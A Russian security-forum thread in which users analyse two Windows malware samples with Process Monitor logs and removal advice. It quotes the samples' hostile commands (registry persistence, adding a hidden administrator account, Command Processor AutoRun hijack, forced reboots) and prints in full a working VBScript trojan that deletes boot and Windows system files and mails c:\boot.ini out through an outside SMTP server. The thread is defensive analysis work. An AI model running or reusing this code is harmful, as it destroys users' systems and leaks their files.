• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Анализ вирусов посредством ProcMon и ProcExp


модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140

модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
Анализ вируса из архива opera.rar
BAT.Shutdown.389 (по классификации dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.


Вирус начал весьма бодренько, через 5 секунд компьютер ушел в перезагрузку, что меня категорически не устроило, поэтому я полез в локальные политики безопасности и снял с себя права на выключение.

Безымянный.jpg


После этого я перезашел в систему, дабы политики применились, и убедился, что кнопка выключения неактивна.

Вирус начал с банальности, распаковав себя в %temp%
Правда в виде bat файла.

Date & Time: 29.05.2013 21:30:27
Event Class: File System
Operation: CreateFile
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat
TID: 3632
Duration: 0.0000918
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Дальше он через CMD запустил сам себя, извращенец.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\cmd.exe
TID: 3632
Duration: 0.0000000
PID: 3672
Command line: cmd /c ""C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat""
Следующий шаг - безуспешная попытка скопировать себя в windows\system32

Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\File.bat
TID: 3676
Duration: 0.0001202
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0
Далее он с помощью утилиты reg добавил себя в автозагрузку HKLM

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 3668
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "C:\Windows\system32\File.bat" /f
Далее идет попытка отключить панель управления. Fail


Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2472
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Date & Time: 29.05.2013 21:30:28
Event Class: Registry
Operation: RegCreateKey
Result: ACCESS DENIED
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
TID: 3792
Duration: 0.0000139
Desired Access: Read/Write


Следующий шаг - установка кодировки cp1251 для CMD.
Для чего - мы увидим через несколько шагов.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: chcp 1251
Current directory: C:\Users\Freelncr\Desktop\
Далее вирус удаляет support юзера. Fail

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3024
Command line: net user SUPPORT_388945a0 /delete
И дальше начинается полная порнография. Вирус добавляет пользователя "Писька" с паролем 111. Fail
Вот зачем был нужен cp1251.

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: net user писька 111 /add
Далее вирус добавляет письку в администраторы, гы гы гы. Fail

Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3772
Command line: net localgroup Администраторы писька /add
Удаляет support из пользователей, неуспешно.


Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3748
Command line: net localgroup Пользователи SUPPORT_388945a0 /del

Далее создает ещё один bat файл в system32. Опять неуспешно, прям пичаль какая.

Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\batinit.bat
TID: 3676
Duration: 0.0000398
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0

Далее добавляет в autorun command processor свой батник. Да ещё с ошибками :)
"C:\Windows\syste m32\batinit.bat"

Этот ключ реестра отвечает за строчку, которая отображается в верху командной строки при запуске. Обычно это
"Microsoft Windows [Version 6.1.7601]
(c) Корпорация Майкрософт (Microsoft Corp.), 2009. Все права защищены."
Т.е данный батник обрабатывался бы при каждом запуске CMD.

в нашем случае это было чуть другое :)


Безымянный4.jpg



Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2264
Command line: reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\batinit.bat" /f

Ну и конечно shutdown, даже с комментарием lol.

Date & Time: 29.05.2013 21:30:29
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3676
Duration: 0.0000000
PID: 2832
Command line: shutdown -r -t 1 -c "lol"

Ну и одновременно с shutdown идет зачистка временных файлов и т.д.

Резюме:
Есть мнение, что создатель данного винлока ходит по городу и рисует слово "х.." на заборах, потому как данный вирус занимается исключительно созданием пользователя "писька" и прочим вандализмом.

Опасность: Средняя, при заражении может доставить уйму неприятностей, т.к. комп будет убегать в ребут сразу после входа в систему. Плюс нестандартный подход с
HKCU\SOFTWARE\Microsoft\Command Processor, что тоже может вызвать дополнительные проблемы.

В итоге данный винлок так и не смог провести заражение, UAC отработал на 5. Разве что компьютер он смог перезагрузить один раз, правда после перезагрузки вирусу было неоткуда запускаться, все попытки записаться в system32 были неуспешны.

Лечение : не требуется. Разве что нужно починить параметр
HKCU\SOFTWARE\Microsoft\Command Processor.
При успешном заражении ручное лечение будет заключаться в очистке параметров реестра :
"HKCU\SOFTWARE\Microsoft\Command Processor"
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Filel "
И удалении файлов:
C:\Windows\System32\File.bat
C:\Windows\System32\batinit.bat
Плюс потребуется удаление письки, гы гы гы.



Ну и напоследок скрин с вирустотала.

Безымянный3.jpg


И второй, с анализом двухдневной давности.

Безымянный2.jpg
 

Вложения

  • LogfileOperaEXE.rar
    25.4 КБ · Просмотры: 4

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Если есть желание, можно это проанализировать ?

Фейковый инсталлер + устанавливает вебалту-вирус + при попытке загрузить какой-либо файл из инета перекидывает на фейковый доунлодер + реклама каждые пять минут качает из инета + шпионит !:)

Запускал из под UAC сругался только на цифровую подпись, но нажал всё равно запустить...Очень важно!!!

Вам нужно авторизоваться, чтобы просмотреть содержимое.


Пароль:111

З.Ы. Данный файл на первых строчках в яндексе, при запросе Alcohol 52% !dushu88
 

модемщик

Уважаемый пользователь
Форумчанин
Регистрация
10.05.2013
Сообщения
36
Репутация
140
Вот еще файл, протестируй если есть свободное время!
Winlock
Pass: 111
***Скрытый текст***

Таки добрался до этого зловреда. Для начала скажу, что писал это чудо явный графоман, данная программа совершает просто невиданное количество действий. (как оказалось автор данного вируса - девачко, гы)

Анализ вируса из архива pikassa.rar
Trojan.KillFiles.11513 (по классификации dr.web)
Исходные данные:
ОС Win7 ult x32
Версия ОС: 6.1.7601 Service Pack 1 сборка 7601
Установленные обновления:
Definition Update for Windows Defender - KB915597 (Definition 1.149.1652.0)Включен UAC на максимальный уровень, работа ведется от администратора.

Особенность данного зловреда в том, что основная масса функций вируса работает через cmd и vbs
Забавно, но вирус можно открыть как текстовый файл и увидеть большую часть кода :)
Выглядит это так:
Безымянный1.jpg



Сам код: Во вложенном текстовом документе.


Теперь по действиям вируса.
Первое - распаковка себя в %temp%

Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp
TID: 3416
Duration: 0.0306462
Desired Access: Generic Read
Disposition: Create
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: None
AllocationSize: 0
OpenResult: Created
Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp\picassa.bat
TID: 3416
Duration: 0.0005353
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created

Далее запускается наш распакованный бат файл и создает в %temp% файлы temp.vbs
Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\temp1.vbs
TID: 3848
Duration: 0.0002271
Desired Access: Generic Write, Read Attributes
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Содержимое temp(1)(2).vbs
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:\ntldr",1
fso.deletefolder "D:\Windows",1
fso.deletefolder "I:\Windows",1
fso.deletefolder "C:\Windows",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefile sr+"\system32\hal.dll",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefolder sr+"\system32\dllcache",1
sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot")
fso.deletefolder sr+"\system32\drives",1
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™"
set application=createobject("shell.application")
application.minimizeall
i=50
while i>0 or i<0
S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16
i=i-1
wend
do
wscript.sleep 200
s.sendkeys"{capslock}"
wscript.sleep 200
s.sendkeys"{numlock}"
wscript.sleep 200
s.sendkeys"{scrolllock}"
loop
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item(" ") = 2
Flds.Item(" ") = 1
Flds.Item(" ") = "support"
Flds.Item(" ") = "support"
Flds.Item(" ") = "smtp.mail.ru"
Flds.Item(" ") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1


on error resume next
set FSO=createobject("scripting.filesystemobject")
do
fso.getfile ("A:\")
loop


on error resume next
Set S = CreateObject("Wscript.Shell")
do
execute"S.Run ""C:\Windows\system32\cmd.exe /c echo "" & Chr(7), 0, True"
loop


В тексте присутствуют очень смешные строчки:
fso.deletefile "C:\ntldr",1
fso.deletefolder "D:\Windows",1
Разбирать дальнешие шаги я не буду, ибо это займет слишком много времени, ограничусь кратким разбором.

Классическое добавление себя в автозагрузку. Правда user32dll.bat вирус записать в папку виндовс даже не удосужился(даже и не пытался).


Date & Time: 22.06.2013 14:39:17
Event Class: Registry
Operation: RegSetValue
Result: SUCCESS
Path: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunExplorer32
TID: 3052
Duration: 0.0007715
Type: REG_SZ
Length: 50
Data: C:\Windows\user32dll.bat


Ещё из забавного - смена кнопок мыши при загрузке компьютера.


Date & Time: 22.06.2013 14:39:19
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3848
Duration: 0.0000000
PID: 3816
Command line: reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f


Напоследок вирус перезагружет компьютер с комментарием "LOL".
Date & Time: 22.06.2013 14:39:20
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3848
Duration: 0.0000000
PID: 3552
Command line: shutdown -r -t 1 -c "lol"
Резюме - это не вирус, а так развлекательная программка, хотя вреда может нанести немало.

во вложении файл с кодом вируса, плюс лог ProcessMonitor(нечитаемый, ибо слишком большой)


ЗЫ: Такое слать на анализ не надо, ибо код данного чуда есть в свободном доступе.
 

Вложения

  • pikassa_log.zip
    597.5 КБ · Просмотры: 3

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 175
Вот вроде как вирусы, Доктор их не видит, не запускал, в архиве 6-ть файлов, на момент публикации базы от 29.06.2013 10:51 !

Безымянный2.png


В архиве 6-ть файлов, если интересно, можешь их проанализировать, может это фейки какие, не запускал, даже не знаю, что там:

Безымянный3.png


Пароль:111
 

Вложения

  • Тест 82.rar
    1.6 МБ · Просмотры: 7
Автор темы Похожие темы Форум Ответы Дата
virt Обзоры новых вирусов 0
Верх Низ